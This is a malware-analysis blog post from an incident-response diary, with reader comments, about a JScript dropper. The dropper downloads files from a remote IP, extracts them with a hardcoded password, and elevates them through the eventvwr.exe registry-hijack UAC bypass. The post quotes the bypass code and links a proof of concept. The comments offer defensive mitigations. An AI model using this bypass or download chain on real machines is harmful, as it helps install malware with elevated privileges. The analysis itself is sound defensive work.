UAC Bypass in JScript Dropper
Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. It's always interesting to have a look at samples coming from alternate sources because they may slightly differ from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from the different campaigns but always based on the same techniques.
The JScript code was, of course, obfuscated but it was easily read by a human. Usually, there is no need to implement complex obfuscation to bypass AV detection. This sample had a score of 8/54 on VT. What was different? First of all, it just tries to download two files from a remote server:
- hxxp://45.58.49.54/7za.exe
- hxxp://45.58.49.54/process.zip
The bad guy was lazy (or smart?) and did not implement complex encryption functions in his code. 7za.exe[1] is a clean file (42badc1d2f03a8b1e4875740d3d49336) used to extract two malicious PE files from the process.zip archive. This archive is protected by a password that is stored and obfuscated in the code. The obfuscation technique is simple: just based on strings of hexadecimal characters:
var AACRSODLXACCGDOLOSOX = LXCTAOHOHSYOAASHNDCA("6D696E617331303030");
This can be easily decoded with Python:
>>> '6D696E617331303030'.decode('hex') 'minas1000'
The destination path is generated via multiple variables and is finally set to "C:\Users\[user]\AppData\Local\", "user" being the victim's login. The archive is unzipped in this directory:
C:\Users\[user]\AppData\Local\7za.exe x C:\Users\[user]\AppData\Local\COCNOACTXATASGNOTOAS -pminas1000 -o C:\Users\[user]\AppData\Local\
Two new PE files are stored on the file system then executed:
- processexplorerpe.exe (55c0548290a5dc43bc54a6a15ccd42fd) [2]
- peprocesss.exe (6b96e8a9c13966086b1e2dd65ac84656) [3]
What makes this sample different? After the classic execution of the PE files, it tries to bypass the Windows UAC using a "feature" present in eventvwr.exe. This system tool runs as a high integrity process and uses HKCU / HKCR registry hives to start mmc.exe which opens finally eventvwr.msc. More information about this behaviour is available on the Microsoft website[4].
The trick is to create the registry entry that is checked by eventvwr.exe and to store the malicious binary ("ODASTATACOTSTAODHOOD" is the path to the malicious peprocess.exe):
var WshShell = WScript.CreateObject ("WScript.Shell"); WshShell.RegWrite ("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\\", ODASTATACOTSTAODHOOD, "REG_SZ");
Once done, eventvwr.exe is started. It will read the registry and execute our sample which will run with high privileges:
var ZLGOZYLOLHONHTXTAOOR = environmentVars("WINDIR") + "\\SYSTEM32\\"+"eventvwr.exe"; AAOGAODYSCSTSOAOLHAC = new ActiveXObject("Wscript.Shell"); AAOGAODYSCSTSOAOLHAC.Run(ZLGOZYLOLHONHTXTAOOR, 1, 1);
Let's wait for the malware to accomplish its bad stuff and remove the registry entry:
WScript.Sleep(60000); var wshShell = new ActiveXObject("WScript.Shell"); wshShell.Run("REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f");
More information about this technique to bypass UAC is available on github.com[5] with a PoC script in Powershell.
If you receive interesting samples, feel free to share them! We always need fresh meat!
[1] http://www.7-zip.org/download.html
[2] https://www.virustotal.com/en/file/305fe0e8e8753dd2bf79fd349760b5c83d75097becc98a541b489bd5456b7b5e/analysis/
[3] https://www.virustotal.com/en/file/7b1f0831ea6943fb1f2a2714f71b16c890baf15c985833e0a590fe6545c7e16f/analysis/
[4] https://msdn.microsoft.com/en-us/library/bb742441.aspx
[5] https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
Reverse-Engineering Malware: Advanced Code Analysis | Online | Greenwich Mean Time | Oct 28th - Nov 1st 2024 |
Comments
Anonymous
Dec 14th 2016
7 years ago
Hopefully, they're not available (403 returned)
Anonymous
Dec 14th 2016
7 years ago
1. use Software Restriction Policies (either SRPv1 alias SAFER, or SRPv2 alias AppLocker) and allow execution only in %SystemRoot% and below as well as %ProgramFiles% and below
2. add the NTFS ACE "(D;OIIO;WP;;;WD)" to %USERPROFILE%, %ALLUSERSPROFILE% and %ProgramData%, meaning "deny execution of files in this directory and its subdirectories"
3. create the registry entry/entries
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"C:\\Windows\\System32\\EventVwr.Exe"="RunAsInvoker"
"C:\\Windows\\SysWoW64\\EventVwr.Exe"="RunAsInvoker"
"C:\\Windows\\Sysnative\\EventVwr.Exe"="RunAsInvoker"
...
Anonymous
Dec 25th 2016
7 years ago
https://msdn.microsoft.com/en-us/library/windows/desktop/aa446583%28v=vs.85%29.aspx
Anonymous
Dec 25th 2016
7 years ago
https://msdn.microsoft.com/en-us/library/windows/desktop/aa446583%28v=vs.85%29.aspx[/quote]
OUCH!
1. everybody NOT living under a rock for more than five years knows KB2532445!
2. before malware can call a Win32 API function with SANDBOX_INERT it must pass past SRP!
Anonymous
Dec 28th 2016
7 years ago